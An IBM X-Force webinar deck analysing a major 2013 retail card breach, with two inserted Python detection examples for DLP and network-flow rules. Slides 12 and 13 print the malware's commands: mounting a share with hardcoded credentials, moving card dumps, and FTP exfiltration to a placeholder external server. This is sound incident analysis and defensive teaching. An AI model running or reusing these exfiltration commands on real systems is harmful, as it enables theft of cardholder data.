
Anatomy of an Advanced Retail Breach



The personal and financial information of approximately 110 million Americans, comprising 11 GB of data, was stolen in a successful compromise of a retail giant during the 2013 Christmas shopping season. Equally concerning is that the attackers persisted – undetected – for as long as two weeks before the breach was discovered. What can retailers and other enterprises learn from this event? Join IBM Security experts on Wednesday, February 19th where we will share details on the anatomy of this breach and recommended steps to protect you against similar attacks.



Anatomy of an Advanced Retail Breach

  1. IBM Security Systems. Anatomy of an Advanced Retail Breach. Chris Poulin, Research Strategist, X-Force. February 2014. © 2014 IBM Corporation
  2. Agenda
     - About the IBM X-Force
     - Dissection of a retail attack and data breach
     - Solutions to prevent similar compromises
     Note: Information provided by IBM in this webinar and the associated blog entry is derived from research by the author and/or the IBM X-Force, and is based on publicly available sources. No information was obtained by, or otherwise derived from, any confidential information shared with IBM.
  3. X-Force is the foundation for advanced security and threat research across the IBM Security Framework. The mission of X-Force is to:
     - Monitor and evaluate the rapidly changing threat landscape
     - Research new attack techniques and develop protection for tomorrow's security challenges
     - Educate our customers and the general public
  4. Collaborative IBM teams monitor and analyze the changing threat landscape
     Coverage:
     - 20,000+ devices under contract
     - 3,700+ managed clients worldwide
     - 15B+ events managed per day
     - 133 monitored countries (MSS)
     - 1,000+ security related patents
     Depth:
     - 17B analyzed web pages & images
     - 40M spam & phishing attacks
     - 73K documented vulnerabilities
     - Billions of intrusion attempts daily
     - Millions of unique malware samples
  5. Anatomy of the Breach (diagram: Attacker, Contractor portals, Firewall, Retailer POS systems, Retailer Windows file server on the internal network, Attacker FTP servers (external/Russia))
     1. Attacker phishes a 3rd party contractor
     2. Attacker uses stolen credentials to access contractor portals
     3a. Attacker finds & infects internal Windows file server
     3b. Attacker finds & infects POS systems w/malware
     4. Malware scrapes RAM for clear text CC stripe data
     5. Malware sends CC data to internal server; sends custom ping to notify
     6. Stolen data is exfiltrated to FTP servers
  6. Step 1. Phish a 3rd Party Contractor (attacker phishes a 3rd party contractor)
     - HVAC firm in PA
     - Email malware campaign
     - Citadel password stealing bot, variant of Zeus banking trojan
     - Primary method of malware detection: free version of Malwarebytes Anti-Malware
       – On-demand scanning; not for commercial use
     - Supplier portal contains lots of public information
       – Example: list of resources for HVAC companies
  7. Step 2. Access & exploit contractor portal (attacker uses stolen credentials to access contractor portal)
     - Contractors generally not required to use token or other 2-factor authentication
  8. Step 3a. Discover & exploit internal file server (attacker finds & infects internal Windows file server)
     - Exact method of movement from portal to internal server unknown
     - Probably not the HVAC partner: cloud-based, not on retailer extranet
     - Back-end connect from partner portal or other retailer owned asset?
     - SQL injection, browser exploit, open ingress port, who knows?
     - Or maybe contractors had access to internal network to monitor HVAC systems remotely
  9. Step 3a. Discover & exploit internal file server (cont'd)
     - Intel from contractor portal? Lots of resources; example: Excel spreadsheets with useful metadata
       – Created by username John.Doe
       – Printed recently on Windows DOMAIN
     - Google search easily reveals location of retail datacenters
     - Malware to accumulate stolen card data and exfiltrate regularly (may have been 2 separate servers)
       – Username="Best1_user"; password="BackupU$r"
       – Same username is installed with BMC Software Performance Assurance for Microsoft Server; password is not generated by BMC
       – Installed as "BladeLogic", hiding as a BMC component (BladeLogic Automation Suite); however, BMC doesn't name any component "bladelogic.exe"
       – System / Administrator level account; can run batch jobs
  10. Step 3b. Find & infect POS systems (attacker finds & infects POS systems w/malware)
     With a point of presence on an internal server, it's all unicorns and rainbows from here. (Image: evil unicorns)
  11. Step 4. Malware scrapes card data from RAM (malware scrapes RAM for clear text CC stripe data)
     - Trojan.POSRAM, variant of BlackPOS
     - No anti-virus solution had a signature for the malware at the time of the attack, or at the time of disclosure
     - Looks for "pos.exe" process
     - Installs trojan, creates registry entries containing string "POSWDS"
     - Scrapes RAM for track 1 and track 2 data of financial cards
     - Card track data is encrypted
       – Between the reader and POS, and
       – again between the POS and payment processor
     - Unencrypted momentarily at the POS as the transaction is cleared
     - Debit card PINs are hashed at the card reader
     - Chip-and-PIN encrypts the transaction from the card to processor
     - Stores stolen card data in file %SystemRoot%\system32\winxml.dll
  12. Step 5. Harvested card data is sent to internal rally point (malware sends CC data to internal server; sends custom ping to notify)
     - Moves stolen card data to a central collection point
     - Assumes POS systems have no internet access
     - Creates temp Windows share on domain
     - Malware on rally point creates share in %windir%\twain_32
     - Encodes base64, with encoding string JN8hdEe3P0cUMTs5kQolDWC9BV26GjRIZnXfOF+K4rYtmqg7b/y1xwvpHiLAzSau
     - Moves winxml.dll to <RallyPoint>_<Day>_<Mon>_<Hr>.txt
     - POS malware sends custom ICMP ping to the rally point as a semaphore
     Commands run on the POS to push the dump to the rally point:
       net use S: \\<HardCodedIP>\c$\WINDOWS\twain_32 /user:Best1_user BackupU$r
       move %windir%\system32\winxml.dll S:\<InfectedMachineName>_<Day>_<Month>_<Hour>.txt
       net use S: /del
  13. Step 6. Card data is exfiltrated to FTP servers in Russia (stolen data is exfiltrated from the retailer Windows file server to attacker FTP servers, external/Russia)
     - Compiles all card dumps into c:\windows\twain_32\a.dll
     - Exfiltrates data via FTP to <PublicFTPServer>/public_html/cgi-bin
     - Generates an FTP script and executes ftp -s:<path>\cmd.txt
  14. Protect endpoints
     - The ultimate prize:
       – POS systems: where the card data is processed
       – File servers: base of operations
       – Web servers: initial incursion vector
       – Contractor workstations: intelligence, credentials
     - Malware protection:
       – Contractor workstations (phishing, Citadel bot)
       – POS systems: RAM scraper trojan
       – File servers: data management and exfiltration tools
       – Application isolation (Intel SGX, micro-virtualization, etc.) to prevent RAM scraping
     - Patch
     - Configuration management
  15. Protection against web and file server compromises
     - Secure development lifecycle (SDLC)
       – Secure coding practices training
       – Static/source code analysis: manual (code review) and automated
       – Dynamic code analysis (esp. low hanging fruit: SQL injection & XSS)
       – Include compiled applications, web applications, mobile apps
     - Go-live security process
       – Harden system (reduce footprint/services, suppress excess information, harden apps, change usernames / passwords)
       – Install appropriate endpoint protection and configuration management
       – Vulnerability scan
     - Appropriate authentication
       – Separate domains / administrative credentials (identity separation)
       – Multi-factor authentication
  16. Segment critical assets
     - Enumerate & classify
     - Restrict web assets' access to internal systems
     - Isolate public / partner facing assets from private assets
     - Segment operational technology (OT), critical assets, and general IT
     - Perform firewall rule analysis, paying special attention to:
       – assets containing sensitive data, such as cardholder information
       – risky protocols and flow directions
     - For example, POS systems shouldn't
       – mount Windows shares, or
       – send regular ICMP packets
  17. Monitor & detect: network
     - Network activity pattern monitoring can detect:
       – Suspicious scanning activity as attacker maps out the network landscape
       – Policy violations for outbound FTP, especially to Eastern Bloc countries
     - Network packet inspection can detect:
       – IPS can stop SQL injection, XSS, other more advanced attacks
       – Credit card number patterns in outbound data
       – Suspect strings in ICMP packets
       – Network traffic that is not what it seems, e.g.:
         • Non-DNS protocol over port 53
         • IRC over port 80
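Slide 12 quotes the custom base64 alphabet the collection malware used, and slide 17 recommends matching credit card number patterns in outbound data; the two points interact, because a plain PAN match never sees a dump that has been re-encoded. The following Python is an added example (not IBM's or X-Force's code) of a DLP-style check that looks for Luhn-valid track 1 / track 2 records in an outbound payload both in the clear and after undoing the custom alphabet. The HTTP payload, the card numbers and all function names are constructed for this example; only the alphabet string comes from the deck.

```python
import base64
import re

# Custom base64 alphabet quoted on slide 12 (the encoding string the malware used).
CUSTOM_ALPHABET = "JN8hdEe3P0cUMTs5kQolDWC9BV26GjRIZnXfOF+K4rYtmqg7b/y1xwvpHiLAzSau"
STANDARD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
_TO_STANDARD = str.maketrans(CUSTOM_ALPHABET, STANDARD_ALPHABET)
_TO_CUSTOM = str.maketrans(STANDARD_ALPHABET, CUSTOM_ALPHABET)

# Magnetic-stripe layouts: track 1 is %B<PAN>^<NAME>^<YYMM>..., track 2 is ;<PAN>=<YYMM>...
TRACK1_RE = re.compile(rb"%B(\d{13,19})\^[^\^]{2,26}\^\d{4}")
TRACK2_RE = re.compile(rb";(\d{13,19})=\d{4}")
# Runs that could be base64 in either alphabet (both use the same 64 characters).
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def luhn_valid(pan: str) -> bool:
    """Luhn mod-10 check; filters digit strings that merely look like a PAN."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def decode_custom_b64(blob: str) -> bytes:
    """Map the custom alphabet back onto the standard one, then base64-decode."""
    return base64.b64decode(blob.translate(_TO_STANDARD))


def encode_custom_b64(data: bytes) -> str:
    """Inverse mapping, used here only to construct sample input."""
    return base64.b64encode(data).decode("ascii").translate(_TO_CUSTOM)


def mask_pan(pan: str) -> str:
    """Keep first six and last four digits so alerts do not leak the PAN."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_track_data(data: bytes) -> list:
    """Return (track, pan) for every Luhn-valid track record in data."""
    hits = []
    for track, pattern in (("track1", TRACK1_RE), ("track2", TRACK2_RE)):
        for m in pattern.finditer(data):
            pan = m.group(1).decode("ascii")
            if luhn_valid(pan):
                hits.append((track, pan))
    return hits


def scan_outbound(payload: bytes) -> list:
    """Check the raw payload, then every base64-looking run after decoding."""
    findings = [{"track": t, "pan": p, "encoded": False}
                for t, p in find_track_data(payload)]
    text = payload.decode("ascii", errors="ignore")
    for run in B64_RUN_RE.findall(text):
        try:
            decoded = decode_custom_b64(run)
        except ValueError:          # bad padding or length: not a base64 run
            continue
        findings.extend({"track": t, "pan": p, "encoded": True}
                        for t, p in find_track_data(decoded))
    return findings


# Constructed sample of outbound traffic: one clear-text track-2 record and one
# record encoded with the custom alphabet. Card numbers are public test PANs.
SAMPLE_OUTBOUND = (
    b"POST /upload HTTP/1.1\r\nHost: example.invalid\r\n\r\n"
    b";4111111111111111=25121010000000000000?\r\n"
    + encode_custom_b64(b";5500000000000004=26011010000000000000?").encode("ascii")
    + b"\r\n"
)

if __name__ == "__main__":
    for f in scan_outbound(SAMPLE_OUTBOUND):
        print(f["track"], mask_pan(f["pan"]), "encoded" if f["encoded"] else "clear")
```

The decoder is deliberately tolerant: every run of 24 or more base64-alphabet characters is tried, and runs that fail to decode are skipped, so the check costs little and catches the encoded dump that a regex on raw bytes would miss.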
  18. Monitor & detect: vulnerability and anomaly detection
     - Vulnerability scanning, including deep endpoint assessment
       – example: registry entries containing "POSWDS"
     - Anomaly detection
       – Profile behavior of critical assets, e.g., POS and HVAC systems (if remote access)
       – Detect deviations from baseline:
         • POS connecting to Windows shares
         • POS emitting ICMP packets
       – General anomalous behavior or change in network pattern: ICMP, SMB/CIFS, FTP
       – Profile ICMP packet sizes, normal payload contents; identify & block deviations
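Slides 16 through 18 describe the policy a POS estate should be held to and the baselines to watch: POS systems never mount Windows shares or emit ICMP, internal hosts do not FTP to external addresses, port 53 carries only DNS, and ICMP payload sizes stay within the learned profile. As an added example (not part of the original deck), the Python below encodes those rules as flow-record checks over constructed records; the subnet layout, the Flow fields, the DNS header heuristic and the function names are all assumptions made for this example.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Constructed inventory (assumption): POS terminals in their own subnet,
# everything in 10/8 is the retailer's internal network.
POS_NET = ip_network("10.20.0.0/16")
INTERNAL_NETS = (ip_network("10.0.0.0/8"),)
SMB_PORTS = {139, 445}


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    proto: str            # "tcp", "udp" or "icmp"
    dport: int = 0        # 0 for icmp
    size: int = 0         # payload bytes, used for ICMP profiling
    payload: bytes = b""  # leading payload bytes when packet inspection captured them


def is_internal(ip: str) -> bool:
    return any(ip_address(ip) in net for net in INTERNAL_NETS)


def is_pos(ip: str) -> bool:
    return ip_address(ip) in POS_NET


def looks_like_dns(payload: bytes) -> bool:
    """Cheap header sanity check (heuristic): a DNS message carries a 12-byte
    header whose opcode is QUERY/IQUERY/STATUS and whose QDCOUNT is small."""
    if len(payload) < 12:
        return False
    opcode = (payload[2] >> 3) & 0x0F
    qdcount = int.from_bytes(payload[4:6], "big")
    return opcode in (0, 1, 2) and qdcount <= 4


def build_icmp_baseline(flows) -> set:
    """Profile normal ICMP payload sizes from a learning window of known-good flows."""
    return {f.size for f in flows if f.proto == "icmp"}


def check_flow(flow: Flow, icmp_baseline: set) -> list:
    """Return the policy/baseline violations a single flow record triggers."""
    alerts = []
    if is_pos(flow.src) and flow.proto == "tcp" and flow.dport in SMB_PORTS:
        alerts.append("POS host connecting to a Windows share")
    if is_pos(flow.src) and flow.proto == "icmp":
        alerts.append("POS host emitting ICMP")
    if flow.proto == "icmp" and flow.size not in icmp_baseline:
        alerts.append(f"ICMP payload size {flow.size} outside baseline")
    if (is_internal(flow.src) and not is_internal(flow.dst)
            and flow.proto == "tcp" and flow.dport == 21):
        alerts.append("outbound FTP from internal host to external address")
    if (flow.proto == "udp" and flow.dport == 53 and flow.payload
            and not looks_like_dns(flow.payload)):
        alerts.append("non-DNS payload over udp/53")
    return alerts


def detect(flows, icmp_baseline: set) -> list:
    """Pair each flow that raised alerts with its alert list."""
    return [(f, a) for f in flows if (a := check_flow(f, icmp_baseline))]


# Constructed learning window: two routers exchanging 56-byte pings.
BASELINE_FLOWS = [Flow("10.1.0.1", "10.1.0.2", "icmp", size=56),
                  Flow("10.1.0.2", "10.1.0.1", "icmp", size=56)]

# Constructed observation window mirroring the rally-point and exfiltration steps.
SAMPLE_FLOWS = [
    Flow("10.20.3.7", "10.1.5.20", "tcp", dport=445),      # POS mounts share on file server
    Flow("10.20.3.7", "10.1.5.20", "icmp", size=1000),     # POS semaphore ping, odd size
    Flow("10.1.5.20", "203.0.113.9", "tcp", dport=21),     # file server FTPs out
    Flow("10.1.7.4", "10.1.0.53", "udp", dport=53, payload=b"NICK retail-bot :join"),
    Flow("10.1.7.5", "10.1.0.53", "udp", dport=53,         # a real-looking DNS query
         payload=b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x03www"),
    Flow("10.1.0.1", "10.1.0.2", "icmp", size=56),         # normal ping
]

if __name__ == "__main__":
    baseline = build_icmp_baseline(BASELINE_FLOWS)
    for flow, alerts in detect(SAMPLE_FLOWS, baseline):
        print(f"{flow.src} -> {flow.dst} {flow.proto}/{flow.dport}: {'; '.join(alerts)}")
```

The rules are written against the asset inventory rather than against specific indicators, which is the point of slides 16 and 18: a POS terminal touching SMB or ICMP is wrong regardless of which malware family does it, and the ICMP size profile flags the semaphore ping without needing its payload string.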
  19. Incident Response
     - Speedy and complete forensics
       – early in the process if the compromise is detected before data is stolen, or
       – after a severe breach when accurate impact analysis is critical:
         • Which systems were compromised?
         • How many customers were affected?
         • How much of the data comprised personal information?
     - Instrument everything feasible
       – include POS systems and network activity
       – Enrich with context from
         • vulnerability assessment tools
         • change management transactions
         • security intelligence feeds
  20. Incident / emergency response
     - Plan should include
       – Detection
       – Response and escalation
       – Engaging law enforcement as appropriate
       – Preservation of evidence
       – Compliance with regulations and contractual agreements
       – Customer and press notification
       – Public relations
     - Engage your contracted external emergency response agency in advance
       – Help you prepare for a breach and
       – Gather context about your environment
     - Test your process regularly
     - Business associate contract and assessment
  21. At IBM, the world is our security lab: Security Operations Centers, Security Research and Development Labs, Institute for Advanced Security Branches. More than 6,000 IBM researchers, developers, and subject matter experts ALL focused on security. 3,000 IBM security patents.
  22. Get Engaged with IBM X-Force Research and Development
     - Follow us at @ibmsecurity and @ibmxforce
     - Download X-Force security trend & risk reports
     - Subscribe to X-Force alerts at or IBM Security blog at
  23. Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed or misappropriated or can result in damage to or misuse of your systems, including to attack others. No IT system or product should be considered completely secure and no single product or security measure can be completely effective in preventing improper access. IBM systems and products are designed to be part of a comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective. IBM DOES NOT WARRANT THAT SYSTEMS AND PRODUCTS ARE IMMUNE FROM THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY.
     © Copyright IBM Corporation 2013. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and/or capabilities referenced in these materials may change at any time at IBM's sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way.
     IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others.